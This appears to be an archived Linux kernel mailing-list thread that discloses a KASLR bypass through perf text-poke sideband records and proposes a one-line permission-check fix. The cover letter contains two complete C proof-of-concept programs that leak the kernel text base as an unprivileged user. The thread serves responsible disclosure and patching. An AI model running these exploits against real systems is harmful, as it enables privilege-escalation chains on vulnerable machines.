mirror of https://lore.kernel.org/lkml/
 help / color / mirror / Atom feed
* [PATCH 0/1] perf/core: Text-poke events expose the kernel text base
@ 2026-09-28 17:59 Zhengchuan Liang
  2026-09-28 17:59 ` [PATCH 1/1] perf/core: Require kernel access for text poke events Zhengchuan Liang
  0 siblings, 1 reply; 2+ messages in thread
From: Zhengchuan Liang @ 2026-09-28 17:59 UTC (permalink / raw)
  To: Peter Zijlstra
  Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Mark Rutland, Alexander Shishkin, Jiri Olsa, Ian Rogers,
	Adrian Hunter, James Clark, linux-perf-users, linux-kernel,
	Zhengchuan Liang

Hi,

I found and validated a kernel address disclosure through perf's
text-poke sideband. At the upstream default perf_event_paranoid=2, an
unprivileged user can open a task-local PERF_COUNT_SW_DUMMY event with
exclude_kernel=1 and text_poke=1, then mmap its ring buffer.
PERF_RECORD_TEXT_POKE records contain raw relocated kernel instruction
addresses, revealing the runtime kernel text base for a known image
despite KASLR.

A disabled, count-only PERF_TYPE_TRACEPOINT event can trigger the leak:
registering its first perf consumer updates an inline static call, and the
observer receives the resulting text-poke record. Numeric tracepoint IDs
can be scanned without tracefs access. A UDP GRO static-call update
independently triggers the same disclosure, so restricting tracepoint
registration would leave the underlying leak open.

The first minimized x86_64 PoC scans tracepoint IDs instead of assuming
a fixed ID. Run both PoCs as an unprivileged user with
perf_event_paranoid=2.

------BEGIN poc1------

  #define _GNU_SOURCE
  #include <linux/perf_event.h>
  #include <stdint.h>
  #include <stdio.h>
  #include <sys/mman.h>
  #include <sys/syscall.h>
  #include <unistd.h>

  #define DATA_PAGES 8
  #define MAX_ID 65535

  struct text_poke {
          struct perf_event_header header;
          uint64_t addr;
          uint16_t old_len;
          uint16_t new_len;
  };

  static int perf_open(uint32_t type, uint64_t config, int disabled,
                       int text_poke)
  {
          struct perf_event_attr attr = {
                  .type = type,
                  .size = sizeof(attr),
                  .config = config,
                  .sample_period = text_poke,
                  .wakeup_events = 1,
                  .disabled = disabled,
                  .exclude_kernel = 1,
                  .text_poke = text_poke,
          };

          return syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
  }

  int main(void)
  {
          long page_size = sysconf(_SC_PAGESIZE);
          struct perf_event_mmap_page *meta;
          unsigned char *data;
          uint64_t head, tail;
          unsigned int id;
          int observer;

          observer = perf_open(PERF_TYPE_SOFTWARE,
                               PERF_COUNT_SW_DUMMY, 0, 1);
          if (observer < 0) {
                  perror("observer perf_event_open");
                  return 1;
          }
          meta = mmap(NULL, (DATA_PAGES + 1) * page_size,
                      PROT_READ | PROT_WRITE, MAP_SHARED, observer, 0);
          if (meta == MAP_FAILED) {
                  perror("mmap");
                  return 1;
          }
          data = (unsigned char *)meta + page_size;

          for (id = 1; id <= MAX_ID; id++) {
                  uint64_t before = __atomic_load_n(&meta->data_head,
                                                    __ATOMIC_ACQUIRE);
                  int trigger = perf_open(PERF_TYPE_TRACEPOINT,
                                          id, 1, 0);

                  if (trigger < 0)
                          continue;
                  head = __atomic_load_n(&meta->data_head,
                                         __ATOMIC_ACQUIRE);
                  if (head != before)
                          break;
                  close(trigger);
          }
          if (id > MAX_ID)
                  return 2;

          tail = meta->data_tail;
          while (tail < head) {
                  struct text_poke *record = (void *)(data +
                          (tail & (meta->data_size - 1)));

                  if (record->header.type == PERF_RECORD_TEXT_POKE) {
                          printf("id=%u text_poke_address=%#llx\n", id,
                                 (unsigned long long)record->addr);
                          return 0;
                  }
                  tail += record->header.size;
          }
          return 3;
  }

------END poc1------

The second PoC triggers a static-call update by configuring UDP GRO and
ESP-in-UDP on an IPv4 UDP socket.

------BEGIN poc2------

  #define _GNU_SOURCE
  #include <linux/perf_event.h>
  #include <linux/udp.h>
  #include <netinet/in.h>
  #include <stdint.h>
  #include <stdio.h>
  #include <sys/mman.h>
  #include <sys/socket.h>
  #include <sys/syscall.h>
  #include <unistd.h>

  #define DATA_PAGES 8

  struct text_poke {
          struct perf_event_header header;
          uint64_t addr;
          uint16_t old_len;
          uint16_t new_len;
  };

  int main(void)
  {
          struct perf_event_attr attr = {
                  .type = PERF_TYPE_SOFTWARE,
                  .size = sizeof(attr),
                  .config = PERF_COUNT_SW_DUMMY,
                  .sample_period = 1,
                  .wakeup_events = 1,
                  .exclude_kernel = 1,
                  .text_poke = 1,
          };
          long page_size = sysconf(_SC_PAGESIZE);
          struct perf_event_mmap_page *meta;
          unsigned char *data;
          uint64_t head, tail;
          int one = 1, encap = UDP_ENCAP_ESPINUDP;
          int observer, sock;

          observer = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
          if (observer < 0) {
                  perror("observer perf_event_open");
                  return 1;
          }
          meta = mmap(NULL, (DATA_PAGES + 1) * page_size,
                      PROT_READ | PROT_WRITE, MAP_SHARED, observer, 0);
          if (meta == MAP_FAILED) {
                  perror("mmap");
                  return 1;
          }
          data = (unsigned char *)meta + page_size;

          sock = socket(AF_INET, SOCK_DGRAM, 0);
          if (sock < 0 ||
              setsockopt(sock, IPPROTO_UDP, UDP_GRO, &one, sizeof(one)) ||
              setsockopt(sock, IPPROTO_UDP, UDP_ENCAP,
                         &encap, sizeof(encap))) {
                  perror("UDP setup");
                  return 1;
          }

          head = __atomic_load_n(&meta->data_head, __ATOMIC_ACQUIRE);
          tail = meta->data_tail;
          while (tail < head) {
                  struct text_poke *record = (void *)(data +
                          (tail & (meta->data_size - 1)));

                  if (record->header.type == PERF_RECORD_TEXT_POKE) {
                          printf("text_poke_address=%#llx\n",
                                 (unsigned long long)record->addr);
                          return 0;
                  }
                  tail += record->header.size;
          }
          return 2;
  }

------END poc2------

I reproduced the leak through both triggers as an unprivileged user on a
kernel built from Torvalds' v7.3-rc5.

Zhengchuan Liang (1):
  perf/core: Require kernel access for text poke events

 kernel/events/core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

-- 
2.34.1

^ permalink raw reply	[flat|nested] 2+ messages in thread

* [PATCH 1/1] perf/core: Require kernel access for text poke events
  2026-09-28 17:59 [PATCH 0/1] perf/core: Text-poke events expose the kernel text base Zhengchuan Liang
@ 2026-09-28 17:59 ` Zhengchuan Liang
  0 siblings, 0 replies; 2+ messages in thread
From: Zhengchuan Liang @ 2026-09-28 17:59 UTC (permalink / raw)
  To: Peter Zijlstra
  Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Mark Rutland, Alexander Shishkin, Jiri Olsa, Ian Rogers,
	Adrian Hunter, James Clark, linux-perf-users, linux-kernel,
	Zhengchuan Liang, stable

Perf events with exclude_kernel=1 can be opened without kernel perf
access. However, exclude_kernel does not suppress text-poke sideband
records. Every PERF_RECORD_TEXT_POKE is marked PERF_RECORD_MISC_KERNEL
and contains a raw kernel instruction address.

An unprivileged task can therefore open and mmap a task-local software
event with text_poke=1. Both opening a count-only tracepoint event and
configuring UDP GRO for ESP-in-UDP cause updates to inline static calls;
the observer receives the relocated addresses of the modified instructions.
For a known kernel image, any such address reveals the runtime kernel
text base despite KASLR.

Call perf_allow_kernel() whenever attr.text_poke is set, regardless of
exclude_kernel. Events that neither monitor kernel execution nor request
text-poke records retain their existing permissions.

Fixes: e17d43b93e54 ("perf: Add perf text poke event")
Cc: stable@vger.kernel.org
Assisted-by: LLM
Signed-off-by: Zhengchuan Liang <zcliangcn@gmail.com>
---
 kernel/events/core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 634d2ccbab82..b4e6e8ae3be7 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -13953,7 +13953,7 @@ SYSCALL_DEFINE5(perf_event_open,
 	if (err)
 		return err;
 
-	if (!attr.exclude_kernel ||
+	if (!attr.exclude_kernel || attr.text_poke ||
 	    ((attr.sample_type & PERF_SAMPLE_CALLCHAIN) &&
 	     !attr.exclude_callchain_kernel)) {
 		err = perf_allow_kernel();
-- 
2.34.1

^ permalink raw reply	[flat|nested] 2+ messages in thread

end of thread, other threads:[~2026-09-28 18:00 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2026-09-28 17:59 [PATCH 0/1] perf/core: Text-poke events expose the kernel text base Zhengchuan Liang
2026-09-28 17:59 ` [PATCH 1/1] perf/core: Require kernel access for text poke events Zhengchuan Liang

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox

all inboxes | Powered by JetHome®